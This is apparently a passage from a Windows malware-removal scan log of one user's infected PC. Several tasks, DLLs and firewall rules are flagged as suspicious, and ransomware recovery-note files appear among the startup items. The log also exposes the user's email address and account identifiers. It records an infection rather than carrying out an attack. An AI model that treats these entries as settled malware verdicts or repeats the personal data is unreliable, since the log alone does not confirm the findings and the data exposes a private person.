ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)

ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)

ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)

ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)

ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)

ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)

ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)

ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)

ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)

Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()

Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]

Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)

Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]

Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)

Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)

Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)

Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)

Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()

Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe

Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)

Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)

Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)

Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION

Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION

Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)

Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy

Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun

Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate

Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate

Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)

Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"

Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)

Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"

Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()

Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)

Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)

Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

 

==================== Shortcuts & WMI ========================

 

(The entries could be listed to be restored or removed.)

 

 

Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()

Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com

Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho

 

ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "

 

==================== Loaded Modules (Whitelisted) ==============

 

2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll

2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll

2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe

2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe

2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll

2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll

2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe

2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll

2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll

2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll

2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll

2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll

2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll

2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node

2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node

2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node

2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node

2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll

2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]

AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"

 

==================== Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com

IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts

 


 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg

DNS Servers: Media is not connected to internet.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"

HKLM\...\StartupApproved\Run32: => "YTDownloader"

HKLM\...\StartupApproved\Run32: => "avgnt"

HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"

HKLM\...\StartupApproved\Run32: => "Dropbox"

HKLM\...\StartupApproved\Run32: => "APSDaemon"

HKLM\...\StartupApproved\Run32: => "QuickTime Task"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE

FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe

FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe

FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886

FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886

FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe

FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869

FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900

FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe

FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe

FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe

FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe

FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe

FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe

FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe

FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe

FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe

FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe

FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe

FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe

FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe

FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe

FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe

FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe

FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe

FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe

FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe

FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe

FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe

FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe

FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe

FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe

FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe

FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe

FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe

FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe

FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe

FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe

FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe

FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe

FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe

FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

